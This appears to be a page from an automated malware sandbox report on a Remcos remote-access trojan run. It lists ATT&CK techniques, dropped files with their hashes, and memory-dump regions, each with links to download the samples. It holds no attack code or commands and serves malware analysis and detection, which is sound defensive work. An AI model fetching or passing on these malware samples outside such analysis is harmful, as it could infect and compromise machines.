Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
80e3e4822cb4d87dc8756ef21ff07e2d

SHA1
650a60207ce01833b8851dbcbfb753054c7e60f1

SHA256
5fbb6e2e481b527d53070bbad911150760bbf6fc27400b21657bb477bfedc349

SHA512
e629b00e726a190dfecdde58cd0eadf7edf9f140d663e617d9a48e23a852774924d3e7400e16f5b1221177fca54d866b745884c9625c83a15419474d5bbc4441

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1jft3eb.cig.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\csuktonhegqjnhcvcllrelisqisuytn

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\lshhfezxqpwcqwdurkqwytgobbxfxiaeiq.vbs

Filesize
322B

MD5
53e961fcbe2540b967efcb5e6c3fd316

SHA1
252bbd1e644ff0124e2039eede8a955d5405a98c

SHA256
f9a970482baa86264faef6c210212b65901857db17241d5c176b6789ee620f42

SHA512
5bbf4fdcbbb403b7e963a91d43aa425ebac5cfaf6e81e592162b9d4d071150c8327f89922f719c25a5cc378aa1e82e043e1f9feda4d78d6f3cdca9f8cdc73700

Download Submit
C:\Users\Admin\AppData\Roaming\Cobblerism.Ace

Filesize
474KB

MD5
b768ffe40278cfdcec1748d9634f545c

SHA1
4f6acf81a2218b6ab1d99a1cf63a0585dd53e5f3

SHA256
c987d9aeb5b30da5425652761e91102fdbbb9523e58920a4f4a16204a167b67a

SHA512
2f4f6f8f99441fbaffa862254c20066f0680a5329f037e2507f24dce8f6bd09360eca0e55f78fc0dc88733a01a4d49576108e41bfa112e4229ab8c8080f25444

Download Submit
memory/1156-80-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1156-81-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1156-79-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1544-88-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-61-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-94-0x0000000000580000-0x0000000000599000-memory.dmp

Filesize
100KB

Download
memory/1544-95-0x0000000000580000-0x0000000000599000-memory.dmp

Filesize
100KB

Download
memory/1544-98-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-101-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-104-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-91-0x0000000000580000-0x0000000000599000-memory.dmp

Filesize
100KB

Download
memory/1544-107-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-110-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-116-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-70-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-67-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-64-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-54-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1544-58-0x00000000006F0000-0x0000000001944000-memory.dmp

Filesize
18.3MB

Download
memory/1860-83-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1860-84-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1860-75-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2032-41-0x0000000007C60000-0x00000000082DA000-memory.dmp

Filesize
6.5MB

Download
memory/2032-40-0x0000000006490000-0x00000000064DC000-memory.dmp

Filesize
304KB

Download
memory/2032-44-0x0000000007660000-0x0000000007682000-memory.dmp

Filesize
136KB

Download
memory/2032-43-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/2032-24-0x0000000005570000-0x0000000005B98000-memory.dmp

Filesize
6.2MB

Download
memory/2032-42-0x0000000006A00000-0x0000000006A1A000-memory.dmp

Filesize
104KB

Download
memory/2032-47-0x0000000008E40000-0x000000000CB5A000-memory.dmp

Filesize
61.1MB

Download
memory/2032-45-0x0000000008890000-0x0000000008E34000-memory.dmp

Filesize
5.6MB

Download
memory/2032-39-0x0000000006450000-0x000000000646E000-memory.dmp

Filesize
120KB

Download
memory/2032-25-0x0000000005BD0000-0x0000000005BF2000-memory.dmp

Filesize
136KB

Download
memory/2032-37-0x0000000005E10000-0x0000000006164000-memory.dmp

Filesize
3.3MB

Download
memory/2032-23-0x0000000002B50000-0x0000000002B86000-memory.dmp

Filesize
216KB

Download
memory/2032-26-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/2032-27-0x0000000005CE0000-0x0000000005D46000-memory.dmp

Filesize
408KB

Download
memory/4508-4-0x00007FFCC5E13000-0x00007FFCC5E15000-memory.dmp

Filesize
8KB

Download
memory/4508-15-0x00007FFCC5E10000-0x00007FFCC68D1000-memory.dmp

Filesize
10.8MB

Download
memory/4508-16-0x00007FFCC5E10000-0x00007FFCC68D1000-memory.dmp

Filesize
10.8MB

Download
memory/4508-19-0x00007FFCC5E10000-0x00007FFCC68D1000-memory.dmp

Filesize
10.8MB

Download
memory/4508-22-0x00007FFCC5E10000-0x00007FFCC68D1000-memory.dmp

Filesize
10.8MB

Download
memory/4508-6-0x0000020C23190000-0x0000020C231B2000-memory.dmp

Filesize
136KB

Download
memory/5052-76-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5052-78-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5052-82-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5052-74-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download